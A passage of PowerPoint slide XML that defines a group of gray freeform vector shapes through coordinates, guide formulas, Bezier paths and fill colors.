                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1760" y="3587"/>
                        <a:ext cx="31" cy="234"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 12 w 12"/>
                          <a:gd name="T1" fmla="*/ 87 h 87"/>
                          <a:gd name="T2" fmla="*/ 0 w 12"/>
                          <a:gd name="T3" fmla="*/ 84 h 87"/>
                          <a:gd name="T4" fmla="*/ 0 w 12"/>
                          <a:gd name="T5" fmla="*/ 0 h 87"/>
                          <a:gd name="T6" fmla="*/ 12 w 12"/>
                          <a:gd name="T7" fmla="*/ 4 h 87"/>
                          <a:gd name="T8" fmla="*/ 12 w 12"/>
                          <a:gd name="T9" fmla="*/ 87 h 8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2" h="87">
                            <a:moveTo>
                              <a:pt x="12" y="87"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="84"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="4"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="87"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="4D4D4D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06" name="Freeform 32"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1791" y="3587"/>
                        <a:ext cx="33" cy="234"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 12"/>
                          <a:gd name="T1" fmla="*/ 87 h 87"/>
                          <a:gd name="T2" fmla="*/ 12 w 12"/>
                          <a:gd name="T3" fmla="*/ 84 h 87"/>
                          <a:gd name="T4" fmla="*/ 12 w 12"/>
                          <a:gd name="T5" fmla="*/ 0 h 87"/>
                          <a:gd name="T6" fmla="*/ 0 w 12"/>
                          <a:gd name="T7" fmla="*/ 4 h 87"/>
                          <a:gd name="T8" fmla="*/ 0 w 12"/>
                          <a:gd name="T9" fmla="*/ 87 h 8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2" h="87">
                            <a:moveTo>
                              <a:pt x="0" y="87"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="12" y="84"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="12" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="4"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="87"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="80808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07" name="Freeform 33"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1144" y="3578"/>
                        <a:ext cx="866" cy="236"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 321"/>
                          <a:gd name="T1" fmla="*/ 65 h 87"/>
                          <a:gd name="T2" fmla="*/ 160 w 321"/>
                          <a:gd name="T3" fmla="*/ 22 h 87"/>
                          <a:gd name="T4" fmla="*/ 160 w 321"/>
                          <a:gd name="T5" fmla="*/ 22 h 87"/>
                          <a:gd name="T6" fmla="*/ 240 w 321"/>
                          <a:gd name="T7" fmla="*/ 0 h 87"/>
                          <a:gd name="T8" fmla="*/ 321 w 321"/>
                          <a:gd name="T9" fmla="*/ 22 h 87"/>
                          <a:gd name="T10" fmla="*/ 240 w 321"/>
                          <a:gd name="T11" fmla="*/ 44 h 87"/>
                          <a:gd name="T12" fmla="*/ 240 w 321"/>
                          <a:gd name="T13" fmla="*/ 44 h 87"/>
                          <a:gd name="T14" fmla="*/ 81 w 321"/>
                          <a:gd name="T15" fmla="*/ 87 h 87"/>
                          <a:gd name="T16" fmla="*/ 0 w 321"/>
                          <a:gd name="T17" fmla="*/ 65 h 8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</a:cxnLst>
                        <a:rect l="0" t="0" r="r" b="b"/>
                        <a:pathLst>
                          <a:path w="321" h="87">
                            <a:moveTo>
                              <a:pt x="0" y="65"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="160" y="22"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="160" y="22"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="240" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="321" y="22"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="240" y="44"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="240" y="44"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="81" y="87"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="65"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="4D4D4D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08" name="Freeform 34"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1361" y="3638"/>
                        <a:ext cx="649" cy="207"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 241"/>
                          <a:gd name="T1" fmla="*/ 65 h 77"/>
                          <a:gd name="T2" fmla="*/ 0 w 241"/>
                          <a:gd name="T3" fmla="*/ 77 h 77"/>
                          <a:gd name="T4" fmla="*/ 241 w 241"/>
                          <a:gd name="T5" fmla="*/ 12 h 77"/>
                          <a:gd name="T6" fmla="*/ 241 w 241"/>
                          <a:gd name="T7" fmla="*/ 0 h 77"/>
                          <a:gd name="T8" fmla="*/ 0 w 241"/>
                          <a:gd name="T9" fmla="*/ 65 h 7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241" h="77">
                            <a:moveTo>
                              <a:pt x="0" y="65"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="77"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="241" y="12"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="241" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="65"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="80808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09" name="Freeform 35"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="1144" y="3755"/>
                        <a:ext cx="217" cy="90"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 80"/>
                          <a:gd name="T1" fmla="*/ 0 h 34"/>
                          <a:gd name="T2" fmla="*/ 0 w 80"/>
                          <a:gd name="T3" fmla="*/ 13 h 34"/>
                          <a:gd name="T4" fmla="*/ 80 w 80"/>
                          <a:gd name="T5" fmla="*/ 34 h 34"/>
                          <a:gd name="T6" fmla="*/ 80 w 80"/>
                          <a:gd name="T7" fmla="*/ 22 h 34"/>
                          <a:gd name="T8" fmla="*/ 0 w 80"/>
                          <a:gd name="T9" fmla="*/ 0 h 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80" h="34">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="13"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="80" y="34"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="80" y="2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808080"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="80808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87" name="Group 36"/>
                    <p:cNvGrpSpPr>
                      <a:grpSpLocks noChangeAspect="1"/>
                    </p:cNvGrpSpPr>
                    <p:nvPr/>
                  </p:nvGrpSpPr>
                  <p:grpSpPr bwMode="auto">
                    <a:xfrm flipH="1">
                      <a:off x="1292" y="2915"/>
                      <a:ext cx="867" cy="288"/>
                      <a:chOff x="3870" y="1964"/>
                      <a:chExt cx="1492" cy="495"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="288" name="Freeform 37"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="4234" y="2060"/>
                        <a:ext cx="1128" cy="399"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 6684 w 6758"/>
                          <a:gd name="T1" fmla="*/ 46 h 2386"/>
                          <a:gd name="T2" fmla="*/ 6529 w 6758"/>
                          <a:gd name="T3" fmla="*/ 5 h 2386"/>
                          <a:gd name="T4" fmla="*/ 6416 w 6758"/>
                          <a:gd name="T5" fmla="*/ 36 h 2386"/>
                          <a:gd name="T6" fmla="*/ 422 w 6758"/>
                          <a:gd name="T7" fmla="*/ 1644 h 2386"/>
                          <a:gd name="T8" fmla="*/ 309 w 6758"/>
                          <a:gd name="T9" fmla="*/ 1675 h 2386"/>
                          <a:gd name="T10" fmla="*/ 102 w 6758"/>
                          <a:gd name="T11" fmla="*/ 1843 h 2386"/>
                          <a:gd name="T12" fmla="*/ 0 w 6758"/>
                          <a:gd name="T13" fmla="*/ 2061 h 2386"/>
                          <a:gd name="T14" fmla="*/ 0 w 6758"/>
                          <a:gd name="T15" fmla="*/ 2223 h 2386"/>
                          <a:gd name="T16" fmla="*/ 76 w 6758"/>
                          <a:gd name="T17" fmla="*/ 2343 h 2386"/>
                          <a:gd name="T18" fmla="*/ 219 w 6758"/>
                          <a:gd name="T19" fmla="*/ 2384 h 2386"/>
                          <a:gd name="T20" fmla="*/ 356 w 6758"/>
                          <a:gd name="T21" fmla="*/ 2347 h 2386"/>
                          <a:gd name="T22" fmla="*/ 6326 w 6758"/>
                          <a:gd name="T23" fmla="*/ 745 h 2386"/>
                          <a:gd name="T24" fmla="*/ 6463 w 6758"/>
                          <a:gd name="T25" fmla="*/ 709 h 2386"/>
                          <a:gd name="T26" fmla="*/ 6658 w 6758"/>
                          <a:gd name="T27" fmla="*/ 545 h 2386"/>
                          <a:gd name="T28" fmla="*/ 6758 w 6758"/>
                          <a:gd name="T29" fmla="*/ 340 h 2386"/>
                          <a:gd name="T30" fmla="*/ 6758 w 6758"/>
                          <a:gd name="T31" fmla="*/ 156 h 2386"/>
                          <a:gd name="T32" fmla="*/ 6684 w 6758"/>
                          <a:gd name="T33" fmla="*/ 46 h 2386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</a:cxnLst>
                        <a:rect l="0" t="0" r="r" b="b"/>
                        <a:pathLst>
                          <a:path w="6758" h="2386">
                            <a:moveTo>
                              <a:pt x="6684" y="46"/>
                            </a:moveTo>
                            <a:cubicBezTo>
                              <a:pt x="6641" y="13"/>
                              <a:pt x="6587" y="0"/>
                              <a:pt x="6529" y="5"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="6416" y="36"/>
                              <a:pt x="6416" y="36"/>
                              <a:pt x="6416" y="36"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="422" y="1644"/>
                              <a:pt x="422" y="1644"/>
                              <a:pt x="422" y="1644"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="309" y="1675"/>
                              <a:pt x="309" y="1675"/>
                              <a:pt x="309" y="1675"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="235" y="1708"/>
                              <a:pt x="162" y="1765"/>
                              <a:pt x="102" y="1843"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="50" y="1913"/>
                              <a:pt x="16" y="1988"/>
                              <a:pt x="0" y="2061"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="0" y="2223"/>
                              <a:pt x="0" y="2223"/>
                              <a:pt x="0" y="2223"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="13" y="2272"/>
                              <a:pt x="38" y="2314"/>
                              <a:pt x="76" y="2343"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="116" y="2373"/>
                              <a:pt x="166" y="2386"/>
                              <a:pt x="219" y="2384"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="356" y="2347"/>
                              <a:pt x="356" y="2347"/>
                              <a:pt x="356" y="2347"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="6326" y="745"/>
                              <a:pt x="6326" y="745"/>
                              <a:pt x="6326" y="745"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="6463" y="709"/>
                              <a:pt x="6463" y="709"/>
                              <a:pt x="6463" y="709"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="6533" y="675"/>
                              <a:pt x="6602" y="619"/>
                              <a:pt x="6658" y="545"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="6708" y="480"/>
                              <a:pt x="6741" y="409"/>
                              <a:pt x="6758" y="340"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="6758" y="156"/>
                              <a:pt x="6758" y="156"/>
                              <a:pt x="6758" y="156"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="6745" y="111"/>
                              <a:pt x="6720" y="73"/>
                              <a:pt x="6684" y="46"/>
                            </a:cubicBezTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="808080"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="bg1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89" name="Freeform 38"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="4234" y="2334"/>
                        <a:ext cx="117" cy="125"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 551 w 701"/>
                          <a:gd name="T1" fmla="*/ 545 h 747"/>
                          <a:gd name="T2" fmla="*/ 577 w 701"/>
                          <a:gd name="T3" fmla="*/ 45 h 747"/>
                          <a:gd name="T4" fmla="*/ 422 w 701"/>
                          <a:gd name="T5" fmla="*/ 5 h 747"/>
                          <a:gd name="T6" fmla="*/ 309 w 701"/>
                          <a:gd name="T7" fmla="*/ 36 h 747"/>
                          <a:gd name="T8" fmla="*/ 102 w 701"/>
                          <a:gd name="T9" fmla="*/ 204 h 747"/>
                          <a:gd name="T10" fmla="*/ 0 w 701"/>
                          <a:gd name="T11" fmla="*/ 422 h 747"/>
                          <a:gd name="T12" fmla="*/ 0 w 701"/>
                          <a:gd name="T13" fmla="*/ 584 h 747"/>
                          <a:gd name="T14" fmla="*/ 76 w 701"/>
                          <a:gd name="T15" fmla="*/ 704 h 747"/>
                          <a:gd name="T16" fmla="*/ 219 w 701"/>
                          <a:gd name="T17" fmla="*/ 745 h 747"/>
                          <a:gd name="T18" fmla="*/ 356 w 701"/>
                          <a:gd name="T19" fmla="*/ 708 h 747"/>
                          <a:gd name="T20" fmla="*/ 551 w 701"/>
                          <a:gd name="T21" fmla="*/ 545 h 74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</a:cxnLst>
                        <a:rect l="0" t="0" r="r" b="b"/>
                        <a:pathLst>
                          <a:path w="701" h="747">
                            <a:moveTo>
                              <a:pt x="551" y="545"/>
                            </a:moveTo>
                            <a:cubicBezTo>
                              <a:pt x="689" y="363"/>
                              <a:pt x="701" y="139"/>
                              <a:pt x="577" y="45"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="534" y="12"/>
                              <a:pt x="480" y="0"/>
                              <a:pt x="422" y="5"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="309" y="36"/>
                              <a:pt x="309" y="36"/>
                              <a:pt x="309" y="36"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="235" y="69"/>
                              <a:pt x="162" y="126"/>
                              <a:pt x="102" y="204"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="50" y="274"/>
                              <a:pt x="16" y="349"/>
                              <a:pt x="0" y="422"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="0" y="584"/>
                              <a:pt x="0" y="584"/>
                              <a:pt x="0" y="584"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="13" y="633"/>
                              <a:pt x="38" y="675"/>
                              <a:pt x="76" y="704"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="116" y="734"/>
                              <a:pt x="166" y="747"/>
                              <a:pt x="219" y="745"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="356" y="708"/>
                              <a:pt x="356" y="708"/>
                              <a:pt x="356" y="708"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="426" y="675"/>
                              <a:pt x="495" y="619"/>
                              <a:pt x="551" y="545"/>
                            </a:cubicBezTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="bg1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90" name="Freeform 39"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="5245" y="2060"/>
                        <a:ext cx="117" cy="125"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 150 w 698"/>
                          <a:gd name="T1" fmla="*/ 205 h 748"/>
                          <a:gd name="T2" fmla="*/ 124 w 698"/>
                          <a:gd name="T3" fmla="*/ 704 h 748"/>
                          <a:gd name="T4" fmla="*/ 266 w 698"/>
                          <a:gd name="T5" fmla="*/ 745 h 748"/>
                          <a:gd name="T6" fmla="*/ 403 w 698"/>
                          <a:gd name="T7" fmla="*/ 709 h 748"/>
                          <a:gd name="T8" fmla="*/ 598 w 698"/>
                          <a:gd name="T9" fmla="*/ 545 h 748"/>
                          <a:gd name="T10" fmla="*/ 698 w 698"/>
                          <a:gd name="T11" fmla="*/ 340 h 748"/>
                          <a:gd name="T12" fmla="*/ 698 w 698"/>
                          <a:gd name="T13" fmla="*/ 156 h 748"/>
                          <a:gd name="T14" fmla="*/ 624 w 698"/>
                          <a:gd name="T15" fmla="*/ 46 h 748"/>
                          <a:gd name="T16" fmla="*/ 469 w 698"/>
                          <a:gd name="T17" fmla="*/ 5 h 748"/>
                          <a:gd name="T18" fmla="*/ 356 w 698"/>
                          <a:gd name="T19" fmla="*/ 36 h 748"/>
                          <a:gd name="T20" fmla="*/ 150 w 698"/>
                          <a:gd name="T21" fmla="*/ 205 h 748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</a:cxnLst>
                        <a:rect l="0" t="0" r="r" b="b"/>
                        <a:pathLst>
                          <a:path w="698" h="748">
                            <a:moveTo>
                              <a:pt x="150" y="205"/>
                            </a:moveTo>
                            <a:cubicBezTo>
                              <a:pt x="12" y="386"/>
                              <a:pt x="0" y="610"/>
                              <a:pt x="124" y="704"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="164" y="735"/>
                              <a:pt x="213" y="748"/>
                              <a:pt x="266" y="745"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="403" y="709"/>
                              <a:pt x="403" y="709"/>
                              <a:pt x="403" y="709"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="473" y="675"/>
                              <a:pt x="542" y="619"/>
                              <a:pt x="598" y="545"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="648" y="480"/>
                              <a:pt x="681" y="409"/>
                              <a:pt x="698" y="340"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="698" y="156"/>
                              <a:pt x="698" y="156"/>
                              <a:pt x="698" y="156"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="685" y="111"/>
                              <a:pt x="660" y="73"/>
                              <a:pt x="624" y="46"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="581" y="13"/>
                              <a:pt x="527" y="0"/>
                              <a:pt x="469" y="5"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="356" y="36"/>
                              <a:pt x="356" y="36"/>
                              <a:pt x="356" y="36"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="282" y="69"/>
                              <a:pt x="209" y="126"/>
                              <a:pt x="150" y="205"/>
                            </a:cubicBezTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="bg1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91" name="Freeform 40"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="4796" y="2173"/>
                        <a:ext cx="125" cy="141"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 124 w 748"/>
                          <a:gd name="T1" fmla="*/ 752 h 847"/>
                          <a:gd name="T2" fmla="*/ 598 w 748"/>
                          <a:gd name="T3" fmla="*/ 593 h 847"/>
                          <a:gd name="T4" fmla="*/ 624 w 748"/>
                          <a:gd name="T5" fmla="*/ 94 h 847"/>
                          <a:gd name="T6" fmla="*/ 150 w 748"/>
                          <a:gd name="T7" fmla="*/ 253 h 847"/>
                          <a:gd name="T8" fmla="*/ 124 w 748"/>
                          <a:gd name="T9" fmla="*/ 752 h 847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748" h="847">
                            <a:moveTo>
                              <a:pt x="124" y="752"/>
                            </a:moveTo>
                            <a:cubicBezTo>
                              <a:pt x="247" y="847"/>
                              <a:pt x="460" y="775"/>
                              <a:pt x="598" y="593"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="736" y="411"/>
                              <a:pt x="748" y="188"/>
                              <a:pt x="624" y="94"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="500" y="0"/>
                              <a:pt x="288" y="71"/>
                              <a:pt x="150" y="253"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="11" y="435"/>
                              <a:pt x="0" y="658"/>
                              <a:pt x="124" y="752"/>
                            </a:cubicBezTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="bg1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92" name="Freeform 41"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="3922" y="1964"/>
                        <a:ext cx="1402" cy="376"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 19842"/>
                          <a:gd name="T1" fmla="*/ 3943 h 5325"/>
                          <a:gd name="T2" fmla="*/ 14695 w 19842"/>
                          <a:gd name="T3" fmla="*/ 0 h 5325"/>
                          <a:gd name="T4" fmla="*/ 19842 w 19842"/>
                          <a:gd name="T5" fmla="*/ 1380 h 5325"/>
                          <a:gd name="T6" fmla="*/ 5149 w 19842"/>
                          <a:gd name="T7" fmla="*/ 5325 h 5325"/>
                          <a:gd name="T8" fmla="*/ 0 w 19842"/>
                          <a:gd name="T9" fmla="*/ 3943 h 532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9842" h="5325">
                            <a:moveTo>
                              <a:pt x="0" y="3943"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="14695" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="19842" y="1380"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="5149" y="5325"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="3943"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="4D4D4D"/>
                      </a:solidFill>
                      <a:ln w="6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="bg1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93" name="Freeform 42"/>
                      <p:cNvSpPr>
                        <a:spLocks noChangeAspect="1"/>
                      </p:cNvSpPr>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr bwMode="gray">
                      <a:xfrm>
                        <a:off x="3870" y="2243"/>
                        <a:ext cx="415" cy="210"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 309 w 2489"/>
                          <a:gd name="T1" fmla="*/ 0 h 1258"/>
                          <a:gd name="T2" fmla="*/ 309 w 2489"/>
                          <a:gd name="T3" fmla="*/ 0 h 1258"/>
                          <a:gd name="T4" fmla="*/ 103 w 2489"/>
                          <a:gd name="T5" fmla="*/ 168 h 1258"/>
                          <a:gd name="T6" fmla="*/ 0 w 2489"/>
                          <a:gd name="T7" fmla="*/ 386 h 1258"/>
                          <a:gd name="T8" fmla="*/ 0 w 2489"/>
                          <a:gd name="T9" fmla="*/ 548 h 1258"/>
                          <a:gd name="T10" fmla="*/ 77 w 2489"/>
                          <a:gd name="T11" fmla="*/ 668 h 1258"/>
                          <a:gd name="T12" fmla="*/ 219 w 2489"/>
                          <a:gd name="T13" fmla="*/ 709 h 1258"/>
                          <a:gd name="T14" fmla="*/ 2265 w 2489"/>
                          <a:gd name="T15" fmla="*/ 1258 h 1258"/>
                          <a:gd name="T16" fmla="*/ 2256 w 2489"/>
                          <a:gd name="T17" fmla="*/ 1253 h 1258"/>
                          <a:gd name="T18" fmla="*/ 2180 w 2489"/>
                          <a:gd name="T19" fmla="*/ 1133 h 1258"/>
                          <a:gd name="T20" fmla="*/ 2180 w 2489"/>
                          <a:gd name="T21" fmla="*/ 971 h 1258"/>
                          <a:gd name="T22" fmla="*/ 2282 w 2489"/>
                          <a:gd name="T23" fmla="*/ 753 h 1258"/>
                          <a:gd name="T24" fmla="*/ 2489 w 2489"/>
                          <a:gd name="T25" fmla="*/ 585 h 1258"/>
                          <a:gd name="T26" fmla="*/ 309 w 2489"/>
                          <a:gd name="T27" fmla="*/ 0 h 1258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</a:cxnLst>
                        <a:rect l="0" t="0" r="r" b="b"/>
                        <a:pathLst>
                          <a:path w="2489" h="1258">
                            <a:moveTo>
                              <a:pt x="309" y="0"/>
                            </a:moveTo>
                            <a:cubicBezTo>
                              <a:pt x="309" y="0"/>
                              <a:pt x="309" y="0"/>
                              <a:pt x="309" y="0"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="235" y="33"/>
                              <a:pt x="162" y="90"/>
                              <a:pt x="103" y="168"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="50" y="238"/>
                              <a:pt x="16" y="313"/>
                              <a:pt x="0" y="386"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="0" y="548"/>
                              <a:pt x="0" y="548"/>
                              <a:pt x="0" y="548"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="13" y="597"/>
                              <a:pt x="38" y="639"/>
                              <a:pt x="77" y="668"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="117" y="699"/>
                              <a:pt x="166" y="712"/>
                              <a:pt x="219" y="709"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="2265" y="1258"/>
                              <a:pt x="2265" y="1258"/>
                              <a:pt x="2265" y="1258"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
                              <a:pt x="2262" y="1256"/>
                              <a:pt x="2259" y="1255"/>
                              <a:pt x="2256" y="1253"/>
                            </a:cubicBezTo>
                            <a:cubicBezTo>
